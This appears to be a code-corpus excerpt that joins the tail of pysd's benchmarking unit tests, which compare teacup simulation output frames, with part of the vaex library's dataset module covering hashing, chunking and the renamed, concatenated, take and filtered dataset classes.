_root,
"more-tests/not_vensim/test_not_vensim.txt"))
self.assertIn(
"Not able to read '",
str(err.exception))
self.assertIn(
"more-tests/not_vensim/test_not_vensim.txt'.",
str(err.exception))
def test_different_frames_error(self):
from pysd.tools.benchmarking import load_outputs, assert_frames_close
with self.assertRaises(AssertionError) as err:
assert_frames_close(
load_outputs(os.path.join(_root, "data/out_teacup.csv")),
load_outputs(
os.path.join(_root, "data/out_teacup_modified.csv")))
self.assertIn(
"Following columns are not close:\n\tTeacup Temperature",
str(err.exception))
self.assertNotIn(
"Column 'Teacup Temperature' is not close.",
str(err.exception))
self.assertNotIn(
"Actual values:\n\t",
str(err.exception))
self.assertNotIn(
"Expected values:\n\t",
str(err.exception))
with self.assertRaises(AssertionError) as err:
assert_frames_close(
load_outputs(os.path.join(_root, "data/out_teacup.csv")),
load_outputs(
os.path.join(_root, "data/out_teacup_modified.csv")),
verbose=True)
self.assertIn(
"Following columns are not close:\n\tTeacup Temperature",
str(err.exception))
self.assertIn(
"Column 'Teacup Temperature' is not close.",
str(err.exception))
self.assertIn(
"Actual values:\n\t",
str(err.exception))
self.assertIn(
"Expected values:\n\t",
str(err.exception))
def test_different_frames_warning(self):
from warnings import catch_warnings
from pysd.tools.benchmarking import load_outputs, assert_frames_close
with catch_warnings(record=True) as ws:
assert_frames_close(
load_outputs(os.path.join(_root, "data/out_teacup.csv")),
load_outputs(
os.path.join(_root, "data/out_teacup_modified.csv")),
assertion="warn")
# use only user warnings
wu = [w for w in ws if issubclass(w.category, UserWarning)]
self.assertEqual(len(wu), 1)
self.assertIn(
"Following columns are not close:\n\tTeacup Temperature",
str(wu[0].message))
self.assertNotIn(
"Column 'Teacup Temperature' is not close.",
str(wu[0].message))
self.assertNotIn(
"Actual values:\n\t",
str(wu[0].message))
self.assertNotIn(
"Expected values:\n\t",
str(wu[0].message))
with catch_warnings(record=True) as ws:
assert_frames_close(
load_outputs(os.path.join(_root, "data/out_teacup.csv")),
load_outputs(
os.path.join(_root, "data/out_teacup_modified.csv")),
assertion="warn", verbose=True)
# use only user warnings
wu = [w for w in ws if issubclass(w.category, UserWarning)]
self.assertEqual(len(wu), 1)
self.assertIn(
"Following columns are not close:\n\tTeacup Temperature",
str(wu[0].message))
self.assertIn(
"Column 'Teacup Temperature' is not close.",
str(wu[0].message))
self.assertIn(
"Actual values:\n\t",
str(wu[0].message))
self.assertIn(
"Expected values:\n\t",
str(wu[0].message))
def test_transposed_frame(self):
from pysd.tools.benchmarking import load_outputs, assert_frames_close
assert_frames_close(
load_outputs(os.path.join(_root, "data/out_teacup.csv")),
load_outputs(
os.path.join(_root, "data/out_teacup_transposed.csv"),
transpose=True))
def test_load_columns(self):
from pysd.tools.benchmarking import load_outputs
out0 = load_outputs(
os.path.join(_root, "data/out_teacup.csv"))
out1 = load_outputs(
os.path.join(_root, "data/out_teacup.csv"),
columns=["Room Temperature", "Teacup Temperature"])
out2 = load_outputs(
os.path.join(_root, "data/out_teacup_transposed.csv"),
transpose=True,
columns=["Heat Loss to Room"])
self.assertEqual(
set(out1.columns),
set(["Room Temperature", "Teacup Temperature"]))
self.assertEqual(
set(out2.columns),
set(["Heat Loss to Room"]))
self.assertTrue((out0.index == out1.index).all())
self.assertTrue((out0.index == out2.index).all())
def test_different_cols(self):
from warnings import catch_warnings
from pysd.tools.benchmarking import assert_frames_close
import pandas as pd
d1 = pd.DataFrame({'a': [1, 2], 'b': [3, 4], 'd': [6, 7]})
d2 = pd.DataFrame({'a': [1, 2]})
d3 = pd.DataFrame({'a': [1, 2], 'c': [3, 4]})
with self.assertRaises(ValueError) as err:
assert_frames_close(
actual=d1,
expected=d2)
self.assertIn(
"Columns from actual and expected values must be equal.",
str(err.exception))
with catch_warnings(record=True) as ws:
assert_frames_close(
actual=d1,
expected=d2,
assertion="warn")
# use only user warnings
wu = [w for w in ws if issubclass(w.category, UserWarning)]
self.assertEqual(len(wu), 1)
self.assertIn("'b'", str(wu[0].message))
self.assertIn("'d'", str(wu[0].message))
self.assertIn(
"from actual values not found in expected values.",
str(wu[0].message))
with catch_warnings(record=True) as ws:
assert_frames_close(
expected=d1,
actual=d2,
assertion="warn")
# use only user warnings
wu = [w for w in ws if issubclass(w.category, UserWarning)]
self.assertEqual(len(wu), 1)
self.assertIn("'b'", str(wu[0].message))
self.assertIn("'d'", str(wu[0].message))
self.assertIn(
"from expected values not found in actual values.",
str(wu[0].message))
with catch_warnings(record=True) as ws:
assert_frames_close(
actual=d1,
expected=d3,
assertion="warn")
# use only user warnings
wu = [w for w in ws if issubclass(w.category, UserWarning)]
self.assertEqual(len(wu), 1)
self.assertIn("'b'", str(wu[0].message))
self.assertIn("'d'", str(wu[0].message))
self.assertIn(
"from actual values not found in expected values.",
str(wu[0].message))
self.assertIn(
"Columns 'c' from expected values not found in actual "
"values.", str(wu[0].message))
def test_invalid_input(self):
from pysd.tools.benchmarking import assert_frames_close
with self.assertRaises(TypeError) as err:
assert_frames_close(
actual=[1, 2],
expected=[1, 2])
self.assertIn(
"Inputs must both be pandas DataFrames.",
str(err.exception))
|
packages/vaex-core/vaex/dataset.py
|
And0k/vaex
| 337 |
76090
|
from abc import abstractmethod, abstractproperty
import os
from pathlib import Path
import collections.abc
import logging
import pkg_resources
import uuid
from urllib.parse import urlparse
from typing import Set, List
import threading
import numpy as np
from frozendict import frozendict
import pyarrow as pa
import vaex
import vaex.execution
import vaex.settings
import vaex.utils
from vaex.array_types import data_type
from .column import Column, ColumnIndexed, supported_column_types
from . import array_types
from vaex import encoding
logger = logging.getLogger('vaex.dataset')
opener_classes = []
HASH_VERSION = "1"
HASH_VERSION_KEY = "version"
chunk_size_default = vaex.settings.main.chunk.size or 1024**2
_dataset_types = {}
lock = threading.Lock()
def register(cls, name=None):
name = name or getattr(cls, 'snake_name') or cls.__name__
_dataset_types[name] = cls
return cls
@encoding.register('dataset')
class dataset_encoding:
@staticmethod
def encode(encoding, dataset):
return dataset.encode(encoding)
@staticmethod
def decode(encoding, dataset_spec):
dataset_spec = dataset_spec.copy()
type = dataset_spec.pop('dataset_type')
cls = _dataset_types[type]
return cls.decode(encoding, dataset_spec)
def open(path, fs_options={}, fs=None, *args, **kwargs):
failures = []
with lock: # since we cache, make this thread save
if not opener_classes:
for entry in pkg_resources.iter_entry_points(group='vaex.dataset.opener'):
logger.debug('trying opener: ' + entry.name)
try:
opener = entry.load()
opener_classes.append(opener)
except Exception as e:
logger.exception('issue loading ' + entry.name)
failures.append((e, entry))
# first the quick path
for opener in opener_classes:
if opener.quick_test(path, fs_options=fs_options, fs=fs):
if opener.can_open(path, fs_options=fs_options, fs=fs, *args, **kwargs):
return opener.open(path, fs_options=fs_options, fs=fs, *args, **kwargs)
# otherwise try all openers
for opener in opener_classes:
try:
if opener.can_open(path, fs_options=fs_options, fs=fs, *args, **kwargs):
return opener.open(path, fs_options=fs_options, fs=fs, *args, **kwargs)
except Exception as e:
failures.append((e, opener))
failures = "\n".join([f'\n-----{who}-----\n:' + vaex.utils.format_exception_trace(e) for e, who in failures])
if failures:
raise IOError(f'Cannot open {path}, failures: {failures}.')
else:
raise IOError(f'Cannot open {path} nobody knows how to read it.')
def _to_bytes(ar):
try:
return ar.view(np.uint8)
except ValueError:
return ar.copy().view(np.uint8)
def hash_combine(*hashes):
hasher = vaex.utils.create_hasher(large_data=False)
for hash in hashes:
hasher.update(hash.encode())
return hasher.hexdigest()
def hash_slice(hash, start, end):
hasher = vaex.utils.create_hasher(hash.encode(), large_data=False)
slice = np.array([start, end], dtype=np.int64)
hasher.update(_to_bytes(slice))
return hasher.hexdigest()
def hash_array_data(ar):
# this function should stay consistent with all future versions
# since this is the expensive part of the hashing
if isinstance(ar, np.ndarray):
ar = ar.ravel()
if ar.dtype == np.object_:
return {"type": "numpy", "data": str(uuid.uuid4()), "mask": None}
if np.ma.isMaskedArray(ar):
data_byte_ar = _to_bytes(ar.data)
hasher = vaex.utils.create_hasher(data_byte_ar, large_data=True)
hash_data = {"type": "numpy", "data": hasher.hexdigest(), "mask": None}
if ar.mask is not True and ar.mask is not False and ar.mask is not np.True_ and ar.mask is not np.False_:
mask_byte_ar = _to_bytes(ar.mask)
hasher = vaex.utils.create_hasher(mask_byte_ar, large_data=True)
hash_data["mask"] = hasher.hexdigest()
return hash_data
else:
try:
byte_ar = _to_bytes(ar)
except ValueError:
byte_ar = ar.copy().view(np.uint8)
hasher = vaex.utils.create_hasher(byte_ar, large_data=True)
hash_data = {"type": "numpy", "data": hasher.hexdigest(), "mask": None}
elif isinstance(ar, (pa.Array, pa.ChunkedArray)):
hasher = vaex.utils.create_hasher(large_data=True)
buffer_hashes = []
hash_data = {"type": "arrow", "buffers": buffer_hashes}
if isinstance(ar, pa.ChunkedArray):
chunks = ar.chunks
else:
chunks = [ar]
for chunk in chunks:
for buffer in chunk.buffers():
if buffer is not None:
hasher.update(memoryview(buffer))
buffer_hashes.append(hasher.hexdigest())
else:
buffer_hashes.append(None)
elif isinstance(ar, vaex.column.Column):
hash_data = {"type": "column", "fingerprint": ar.fingerprint()}
else:
raise TypeError
return hash_data
def hash_array(ar, hash_info=None, return_info=False):
# this function can change over time, as it builds on top of the expensive part
# (hash_array_data), so we can cheaply calculate new hashes if we pass on hash_info
if hash_info is None:
hash_info = hash_array_data(ar)
if hash_info.get(HASH_VERSION_KEY) == HASH_VERSION: # TODO: semver check?
return hash_info['hash'], hash_info
if isinstance(ar, np.ndarray):
if ar.dtype == np.object_:
return hash_info['data'] # uuid, so always unique
if np.ma.isMaskedArray(ar):
if not (hash_info['type'] == 'numpy' and hash_info['data'] and hash_info['mask']):
hash_info = hash_array_data(ar)
else:
if not (hash_info['type'] == 'numpy' and hash_info['data']):
hash_info = hash_array_data(ar)
keys = [HASH_VERSION, hash_info['type'], hash_info['data']]
if hash_info['mask']:
keys.append(hash_info['mask'])
elif isinstance(ar, vaex.array_types.supported_arrow_array_types):
if not (hash_info['type'] == 'arrow' and hash_info['buffers']):
hash_info = hash_array_data(ar)
keys = [HASH_VERSION]
keys.extend(["NO_BUFFER" if not b else b for b in hash_info['buffers']])
elif isinstance(ar, vaex.column.Column):
if not (hash_info['type'] == 'column'):
hash_info = hash_array_data(ar)
keys = [HASH_VERSION]
keys.append(hash_info['fingerprint'])
hasher = vaex.utils.create_hasher(large_data=False) # small amounts of data
for key in keys:
hasher.update(key.encode('ascii'))
hash = hasher.hexdigest()
if return_info:
hash_info['hash'] = hash
hash_info[HASH_VERSION_KEY] = HASH_VERSION
return hash, hash_info
else:
return hash
def to_supported_array(ar):
if not isinstance(ar, supported_column_types):
ar = np.asanyarray(ar)
if isinstance(ar, np.ndarray) and ar.dtype.kind == 'U':
ar = vaex.column.ColumnArrowLazyCast(ar, pa.string())
elif isinstance(ar, np.ndarray) and ar.dtype.kind == 'O':
ar_data = ar
if np.ma.isMaskedArray(ar):
ar_data = ar.data
try:
# "k != k" is a way to detect NaN's and NaT's
types = list({type(k) for k in ar_data if k is not None and k == k})
except ValueError:
# If there is an array value in the column, Numpy throws a ValueError
# "The truth value of an array with more than one element is ambiguous".
# We don't handle this by default as it is a bit slower.
def is_missing(k):
if k is None:
return True
try:
# a way to detect NaN's and NaT
return not (k == k)
except ValueError:
# if a value is an array, this will fail, and it is a non-missing
return False
types = list({type(k) for k in ar_data if k is not is_missing(k)})
if len(types) == 1 and issubclass(types[0], str):
# TODO: how do we know it should not be large_string?
# self._dtypes_override[valid_name] = pa.string()
ar = vaex.column.ColumnArrowLazyCast(ar, pa.string())
if len(types) == 0: # can only be if all nan right?
ar = ar.astype(np.float64)
return ar
def _concat_chunk_list(list_of_chunks):
dict_of_list_of_arrays = collections.defaultdict(list)
for chunks in list_of_chunks:
for name, array in chunks.items():
if isinstance(array, pa.ChunkedArray):
dict_of_list_of_arrays[name].extend(array.chunks)
else:
dict_of_list_of_arrays[name].append(array)
chunks = {name: vaex.array_types.concat(arrays) for name, arrays in dict_of_list_of_arrays.items()}
return chunks
def _slice_of_chunks(chunks_ready_list, chunk_size):
current_row_count = 0
chunks_current_list = []
while current_row_count < chunk_size and chunks_ready_list:
chunks_current = chunks_ready_list.pop(0)
chunk = list(chunks_current.values())[0]
# chunks too large, split, and put back a part
if current_row_count + len(chunk) > chunk_size:
strict = True
if strict:
needed_length = chunk_size - current_row_count
current_row_count += needed_length
assert current_row_count == chunk_size
chunks_head = {name: vaex.array_types.slice(chunk, 0, needed_length) for name, chunk in chunks_current.items()}
chunks_current_list.append(chunks_head)
chunks_extra = {name: vaex.array_types.slice(chunk, needed_length) for name, chunk in chunks_current.items()}
chunks_ready_list.insert(0, chunks_extra) # put back the extra in front
else:
current_row_count += len(chunk)
chunks_current_list.append(chunks_current)
else:
current_row_count += len(chunk)
chunks_current_list.append(chunks_current)
return chunks_current_list, current_row_count
def chunk_rechunk(chunk_iter, chunk_size):
chunks_ready_list = []
i1 = i2 = 0
for _, _, chunks in chunk_iter:
chunks_ready_list.append(chunks)
total_row_count = sum([len(list(k.values())[0]) for k in chunks_ready_list])
if total_row_count > chunk_size:
chunks_current_list, current_row_count = vaex.dataset._slice_of_chunks(chunks_ready_list, chunk_size)
i2 += current_row_count
chunks = vaex.dataset._concat_chunk_list(chunks_current_list)
yield i1, i2, chunks
i1 = i2
while chunks_ready_list:
chunks_current_list, current_row_count = vaex.dataset._slice_of_chunks(chunks_ready_list, chunk_size)
i2 += current_row_count
chunks = vaex.dataset._concat_chunk_list(chunks_current_list)
yield i1, i2, chunks
i1 = i2
def _rechunk(chunk_iter, chunk_size):
def wrapper():
i1 = i2 = 0
for chunks in chunk_iter:
i2 += len(list(chunks.values())[0])
yield i1, i2, chunks
i1 = i2
yield from chunk_rechunk(wrapper(), chunk_size)
def empty_chunk_iterator(start, end, chunk_size):
length = end - start
i1 = 0
i2 = min(length, i1 + chunk_size)
while i1 < length:
yield i1, i2, {}
i1 = i2
i2 = min(length, i1 + chunk_size)
class Dataset(collections.abc.Mapping):
def __init__(self):
super().__init__()
self._columns = frozendict()
self._row_count = None
self._id = str(uuid.uuid4())
self._cached_fingerprint = None
def __repr__(self):
import yaml
data = self.__repr_data__()
return yaml.dump(data, sort_keys=False, indent=4)
def __repr_data__(self):
state = self.__getstate__()
def normalize(v):
if isinstance(v, Dataset):
return v.__repr_data__()
if isinstance(v, frozendict):
return dict(v)
if isinstance(v, vaex.dataframe.DataFrame):
return {'type': 'dataframe', 'repr': repr(v)}
if isinstance(v, np.ndarray):
return v.tolist()
return v
return {'type': self.snake_name, **{k: normalize(v) for k, v in state.items() if not k.startswith('_')}}
@property
def id(self):
'''id that uniquely identifies a dataset at runtime'''
return self.fingerprint
@property
def fingerprint(self):
'''id that uniquely identifies a dataset cross runtime, might be more expensive and require hasing'''
if self._cached_fingerprint is None:
self._cached_fingerprint = self._fingerprint
return self._cached_fingerprint
@abstractproperty
def _fingerprint(self):
pass
def encode(self, encoding):
if not encoding.has_object_spec(self.id):
spec = self._encode(encoding)
encoding.set_object_spec(self.id, spec)
return {'dataset_type': self.snake_name, 'object-id': self.id}
@classmethod
def decode(cls, encoding, spec):
id = spec['object-id']
if not encoding.has_object(id):
spec = encoding.get_object_spec(id)
ds = cls._decode(encoding, spec)
encoding.set_object(id, ds)
return encoding.get_object(id)
@abstractmethod
def _create_columns(self):
pass
@property
def name(self):
# TODO: in the future, we might want to use self.fingerprint or self.id
return "no-name"
def __getstate__(self):
state = self.__dict__.copy()
del state['_columns']
del state['_cached_fingerprint']
return state
def __setstate__(self, state):
self.__dict__.update(state)
self._cached_fingerprint = None
self._create_columns()
def schema(self, array_type=None):
return {name: vaex.array_types.data_type(col) for name, col in self.items()}
def shapes(self):
return {name: self.shape(name) for name, col in self.items()}
def _set_row_count(self):
if not self._columns:
return
values = list(self._columns.values())
self._row_count = len(values[0])
for name, value in list(self._columns.items())[1:]:
if len(value) != self._row_count:
raise ValueError(f'First columns has length {self._row_count}, while column {name} has length {len(value)}')
@property
def row_count(self):
return self._row_count
def project(self, *names):
all = set(self)
drop = all - set(names)
# we want a deterministic order for fingerprints
drop = list(drop)
drop.sort()
return self.dropped(*list(drop))
def concat(self, *others, resolver='flexible'):
datasets = []
if isinstance(self, DatasetConcatenated):
datasets.extend(self.datasets)
else:
datasets.extend([self])
for other in others:
if isinstance(other, DatasetConcatenated):
datasets.extend(other.datasets)
else:
datasets.extend([other])
return DatasetConcatenated(datasets, resolver=resolver)
def take(self, indices, masked=False):
return DatasetTake(self, indices, masked=masked)
def renamed(self, renaming):
return DatasetRenamed(self, renaming)
def merged(self, rhs):
return DatasetMerged(self, rhs)
def dropped(self, *names):
return DatasetDropped(self, names)
def __getitem__(self, item):
if isinstance(item, slice):
assert item.step in [1, None]
return self.slice(item.start or 0, item.stop or self.row_count)
return self._columns[item]
def __len__(self):
return len(self._columns)
def __iter__(self):
return iter(self._columns)
def get_data(self, i1, i2, names):
raise NotImplementedError
def __eq__(self, rhs):
if not isinstance(rhs, Dataset):
return NotImplemented
# simple case, if fingerprints are equal, the data is equal
if self.fingerprint == rhs.fingerprint:
return True
# but no the other way around
keys = set(self)
keys_hashed = set(self._ids)
missing = keys ^ keys_hashed
if missing:
return self.fingerprint == rhs.fingerprint
keys = set(rhs)
keys_hashed = set(rhs._ids)
missing = keys ^ keys_hashed
if missing:
return self.fingerprint == rhs.fingerprint
return self._ids == rhs._ids
def __hash__(self):
keys = set(self)
keys_hashed = set(self._ids)
missing = keys ^ keys_hashed
if missing:
# if we don't have hashes for all columns, we just use the fingerprint
return hash(self.fingerprint)
return hash(tuple(self._ids.items()))
def _default_lazy_chunk_iterator(self, array_map, columns, chunk_size, reverse=False):
chunk_size = chunk_size or 1024**2
chunk_count = (self.row_count + chunk_size - 1) // chunk_size
chunks = range(chunk_count)
if reverse:
chunks = reversed(chunks)
for i in chunks:
i1 = i * chunk_size
i2 = min((i + 1) * chunk_size, self.row_count)
def reader(i1=i1, i2=i2):
chunks = {k: array_map[k][i1:i2] for k in columns}
length = i2 - i1
for name, chunk in chunks.items():
assert len(chunk) == length, f'Oops, got a chunk ({name}) of length {len(chunk)} while it is expected to be of length {length} (at {i1}-{i2}'
return chunks
yield i1, i2, reader
def _default_chunk_iterator(self, array_map, columns, chunk_size, reverse=False):
for i1, i2, reader in self._default_lazy_chunk_iterator(array_map, columns, chunk_size, reverse):
yield i1, i2, reader()
@abstractmethod
def chunk_iterator(self, columns, chunk_size=None, reverse=False):
pass
@abstractmethod
def is_masked(self, column):
pass
@abstractmethod
def shape(self, column):
pass
@abstractmethod
def close(self):
'''Close file handles or other resources, the DataFrame will not be in a usable state afterwards.'''
pass
@abstractmethod
def slice(self, start, end):
pass
@abstractmethod
def hashed(self):
pass
@abstractmethod
def leafs(self) -> List["Dataset"]:
pass
class DatasetDecorator(Dataset):
def __init__(self, original):
super().__init__()
self.original = original
def leafs(self) -> List[Dataset]:
return self.original.leafs()
def close(self):
self.original.close()
def is_masked(self, column):
return self.original.is_masked(column)
def shape(self, column):
return self.original.shape(column)
class ColumnProxy(vaex.column.Column):
'''To give the Dataset._columns object useful containers for debugging'''
ds: Dataset
def __init__(self, ds, name, type):
self.ds = ds
self.name = name
self.dtype = type
def _fingerprint(self):
fp = vaex.cache.fingerprint(self.ds.fingerprint, self.name)
return f'column-proxy-{fp}'
def __len__(self):
return self.ds.row_count
def to_numpy(self):
values = self[:]
return np.array(values)
def __getitem__(self, item):
if isinstance(item, slice):
array_chunks = []
ds = self.ds.__getitem__(item)
for chunk_start, chunk_end, chunks in ds.chunk_iterator([self.name]):
ar = chunks[self.name]
if isinstance(ar, pa.ChunkedArray):
array_chunks.extend(ar.chunks)
else:
array_chunks.append(ar)
if len(array_chunks) == 1:
return array_chunks[0]
if len(array_chunks) == 0:
return vaex.dtype(self.dtype).create_array([])
return vaex.array_types.concat(array_chunks)
else:
raise NotImplementedError
@register
class DatasetRenamed(DatasetDecorator):
snake_name = 'rename'
def __init__(self, original, renaming):
super().__init__(original)
self.renaming = renaming
self.reverse = {v: k for k, v in renaming.items()}
self._create_columns()
self._ids = frozendict({renaming.get(name, name): ar for name, ar in original._ids.items()})
self._set_row_count()
def renamed(self, renaming):
# # {'a': 'x', 'b': 'y'} and {'x': 'a', 'b': 'z', 'c', 'q'} -> {'b': 'z', 'c': 'q'}
resulting = {}
renaming = renaming.copy() # we'll modify in place
for old, new in self.renaming.items():
if new in renaming:
if old == renaming[new]:
pass # e.g. x->a->x
else:
resulting[old] = renaming[new]
del renaming[new] # we already covered this
else:
# e.g. x->a->a
resulting[old] = new
# e.g. x->x->a
resulting.update(renaming)
return DatasetRenamed(self.original, resulting)
@property
def _fingerprint(self):
id = vaex.cache.fingerprint(self.original.fingerprint, self.renaming)
return f'dataset-{self.snake_name}-{self.original.fingerprint}'
def _create_columns(self):
self._columns = frozendict({self.renaming.get(name, name): ar for name, ar in self.original.items()})
def _encode(self, encoding):
dataset_spec = encoding.encode('dataset', self.original)
return {'renaming': dict(self.renaming), 'dataset': dataset_spec}
@classmethod
def _decode(cls, encoding, spec):
dataset = encoding.decode('dataset', spec['dataset'])
return cls(dataset, spec['renaming'])
def chunk_iterator(self, columns, chunk_size=None, reverse=False):
for name in columns:
if name in self.renaming:
rename = self.renaming[name]
raise KeyError(f'Oops, you tried to get column {name}, but you renamed it to {rename}')
columns = [self.reverse.get(name, name) for name in columns]
for i1, i2, chunks in self.original.chunk_iterator(columns, chunk_size, reverse=reverse):
yield i1, i2, {self.renaming.get(name, name): ar for name, ar in chunks.items()}
def is_masked(self, column):
return self.original.is_masked(self.reverse.get(column, column))
def shape(self, column):
return self.original.shape(self.reverse.get(column, column))
def slice(self, start, end):
if start == 0 and end == self.row_count:
return self
return type(self)(self.original.slice(start, end), self.renaming)
def hashed(self):
if set(self._ids) == set(self):
return self
return type(self)(self.original.hashed(), self.renaming)
@register
class DatasetConcatenated(Dataset):
snake_name = "concat"
def __init__(self, datasets, resolver):
super().__init__()
self.datasets = datasets
self.resolver = resolver
if self.resolver == 'strict':
for dataset in datasets[1:]:
if set(dataset) != set(datasets[0]):
l = set(dataset)
r = set(datasets[0])
diff = l ^ r
raise NameError(f'Concatenating datasets with different names: {l} and {r} (difference: {diff})')
self._schema = datasets[0].schema()
self._shapes = datasets[0].shapes()
for dataset in datasets[1:]:
if dataset.shapes() != self._shapes:
raise ValueError(f'Cannot concatenate with different shapes: {self._shapes} != {dataset.shapes()}')
for dataset in datasets[1:]:
schema = dataset.schema()
if dataset.schema() != self._schema:
raise ValueError(f'Cannot concatenate with different schemas: {self._shapes} != {dataset.shapes()}')
elif self.resolver == 'flexible':
schemas = [ds.schema() for ds in datasets]
shapes = [ds.shapes() for ds in datasets]
# try to keep the order of the original dataset
schema_list_map = {}
for schema in schemas:
for name, type in schema.items():
if name not in schema_list_map:
schema_list_map[name] = []
for name, type_list in schema_list_map.items():
for schema in schemas:
# None means it is means the column is missing
type_list.append(schema.get(name))
from .schema import resolver_flexible
# shapes
shape_list_map = {}
for shape in shapes:
for name, type in shape.items():
if name not in shape_list_map:
shape_list_map[name] = []
for name, shape_list in shape_list_map.items():
for shapes_ in shapes:
# None means it is means the column is missing
shape_list.append(shapes_.get(name))
self._schema = {}
self._shapes = {}
for name in shape_list_map:
self._schema[name], self._shapes[name] = resolver_flexible.resolve(schema_list_map[name], shape_list_map[name])
else:
raise ValueError(f'Invalid resolver {resolver}, choose between "strict" or "flexible"')
self._create_columns()
self._set_row_count()
@property
def _fingerprint(self):
ids = [ds.fingerprint for ds in self.datasets]
id = vaex.cache.fingerprint(*ids)
return f'dataset-{self.snake_name}-{id}'
def _create_columns(self):
columns = {}
hashes = {}
for name in self._schema:
columns[name] = ColumnProxy(self, name, self._schema[name])
if all(name in ds._ids for ds in self.datasets):
hashes[name] = hash_combine(*[ds._ids[name] for ds in self.datasets])
self._columns = frozendict(columns)
self._ids = frozendict(hashes)
def _encode(self, encoding, skip=set()):
datasets = encoding.encode_list('dataset', self.datasets)
spec = {'dataset_type': self.snake_name, 'datasets': datasets, 'resolver': self.resolver}
return spec
@classmethod
def _decode(cls, encoding, spec):
datasets = encoding.decode_list('dataset', spec['datasets'])
ds = cls(datasets, spec['resolver'])
return ds
def is_masked(self, column):
for dataset in self.datasets:
if column not in dataset:
return True
return any(k.is_masked(column) for k in self.datasets)
def shape(self, column):
return self._shapes[column]
def _set_row_count(self):
self._row_count = sum(ds.row_count for ds in self.datasets)
def schema(self, array_type=None):
return self._schema.copy()
def _chunk_iterator_non_strict(self, columns, chunk_size=None, reverse=False, start=0, end=None):
end = self.row_count if end is None else end
offset = 0
for dataset in self.datasets:
present = [k for k in columns if k in dataset]
# skip over whole datasets
if start >= offset + dataset.row_count:
offset += dataset.row_count
continue
# we are past the end
if end <= offset:
break
for i1, i2, chunks in dataset.chunk_iterator(present, chunk_size=chunk_size, reverse=reverse):
# chunks = {name: vaex.array_types.to_arrow(ar) for name, ar in chunks.items()}
length = i2 - i1
chunk_start = offset
chunk_end = offset + length
if start >= chunk_end: # we didn't find the beginning yet
offset += length
continue
if end <= chunk_start: # we are past the end
# assert False
break
if start > chunk_start:
# this means we have to cut off a piece of the beginning
if end < chunk_end:
# AND the end
length = end - chunk_start # without the start cut off
length -= start - chunk_start # correcting for the start cut off
assert length > 0
chunks = {name: vaex.array_types.slice(ar, start - chunk_start, length) for name, ar in chunks.items()}
for name, ar in chunks.items():
assert len(ar) == length, f'Oops, array was expected to be of length {length} but was {len(ar)}'
else:
length -= start - chunk_start # correcting for the start cut off
assert length > 0
chunks = {name: vaex.array_types.slice(ar, start - chunk_start) for name, ar in chunks.items()}
for name, ar in chunks.items():
assert len(ar) == length, f'Oops, array was expected to be of length {length} but was {len(ar)}'
else:
if end < chunk_end:
# we only need to cut off a piece of the end
length = end - chunk_start
assert length > 0
chunks = {name: vaex.array_types.slice(ar, 0, length) for name, ar in chunks.items()}
for name, ar in chunks.items():
assert len(ar) == length, f'Oops, array was expected to be of length {length} but was {len(ar)}'
from .schema import resolver_flexible
allchunks = {name: resolver_flexible.align(length, chunks.get(name), self._schema[name], self._shapes[name]) for name in columns}
yield {k: allchunks[k] for k in columns}
offset += (i2 - i1)
def chunk_iterator(self, columns, chunk_size=None, reverse=False, start=0, end=None):
chunk_size = chunk_size or 1024*1024
i1 = 0
i1 = i2 = 0
if not columns:
end = self.row_count if end is None else end
yield from empty_chunk_iterator(start, end, chunk_size)
else:
chunk_iterator = self._chunk_iterator_non_strict(columns, chunk_size, reverse=reverse, start=start, end=self.row_count if end is None else end)
yield from _rechunk(chunk_iterator, chunk_size)
def close(self):
for ds in self.datasets:
ds.close()
def slice(self, start, end):
if start == 0 and end == self.row_count:
return self
# TODO: we can be smarter here, and trim off some datasets
return DatasetSliced(self, start=start, end=end)
def hashed(self):
if set(self._ids) == set(self):
return self
return type(self)([dataset.hashed() for dataset in self.datasets], resolver=self.resolver)
def leafs(self) -> List[Dataset]:
return [self]
# def leafs(self) -> List[Dataset]:
# leafs = list()
# for ds in self.datasets:
# leafs.extend(ds.leafs())
# return leafs
@register
class DatasetTake(DatasetDecorator):
snake_name = "take"
def __init__(self, original, indices, masked):
super().__init__(original)
self.indices = indices
self.masked = masked
self._lazy_hash_index = None
self._create_columns()
self._set_row_count()
@property
def _fingerprint(self):
id = vaex.cache.fingerprint(self.original.fingerprint, self._hash_index, self.masked)
return f'dataset-{self.snake_name}-{id}'
@property
def _hash_index(self):
if self._lazy_hash_index is None:
self._lazy_hash_index = hash_array(self.indices)
return self._lazy_hash_index
def _create_columns(self):
# if the columns in ds already have a ColumnIndex
# we could do, direct_indices = df.column['bla'].indices[indices]
# which should be shared among multiple ColumnIndex'es, so we store
# them in this dict
direct_indices_map = {}
columns = {}
hashes = {}
for name, column in self.original.items():
columns[name] = ColumnIndexed.index(column, self.indices, direct_indices_map, masked=self.masked)
if name in self.original._ids:
hashes[name] = hash_combine(self._hash_index, self.original._ids[name])
self._columns = frozendict(columns)
self._ids = frozendict(hashes)
def _encode(self, encoding, skip=set()):
dataset_spec = encoding.encode('dataset', self.original)
spec = {'dataset_type': self.snake_name, 'dataset': dataset_spec}
spec['indices'] = encoding.encode('array', self.indices)
spec['masked'] = self.masked
return spec
@classmethod
def _decode(cls, encoding, spec):
dataset = encoding.decode('dataset', spec['dataset'])
indices = encoding.decode('array', spec['indices'])
ds = cls(dataset, indices, spec['masked'])
return ds
def chunk_iterator(self, columns, chunk_size=None, reverse=False):
# TODO: we may be able to do this slightly more efficient by first
# materializing the columns
yield from self._default_chunk_iterator(self._columns, columns, chunk_size, reverse=reverse)
def slice(self, start, end):
if start == 0 and end == self.row_count:
return self
return DatasetSlicedArrays(self, start=start, end=end)
def hashed(self):
if set(self._ids) == set(self):
return self
return type(self)(self.original.hashed(), self.indices, self.masked)
@register
class DatasetFiltered(DatasetDecorator):
snake_name = 'filter'
def __init__(self, original, filter, expected_length=None, state=None, selection=None):
super().__init__(original)
self._filter = filter
self._lazy_hash_filter = None
self._create_columns()
self._row_count = np.sum(self._filter).item()
self.state = state
self.selection = selection
if expected_length is not None:
if expected_length != self._row_count:
raise ValueError(f'Expected filter to have {expected_length} true values, but counted {self._row_count}')
@property
def _fingerprint(self):
id = vaex.cache.fingerprint(self.original.id, self._hash_index, self.state, self.selection)
return f'dataset-{self.snake_name}-{id}'
@property
def _hash_index(self):
if self._lazy_hash_filter is None:
self._lazy_hash_filter = hash_array(self._filter)
return self._lazy_hash_filter
def _create_columns(self):
columns = {name: vaex.dataset.ColumnProxy(self, name, data_type(col)) for name, col in self.original._columns.items()}
hashes = {}
for name, column in self.original.items():
if name in self.original._ids:
hashes[name] = hash_combine(self._hash_index, self.original._ids[name])
self._columns = frozendict(columns)
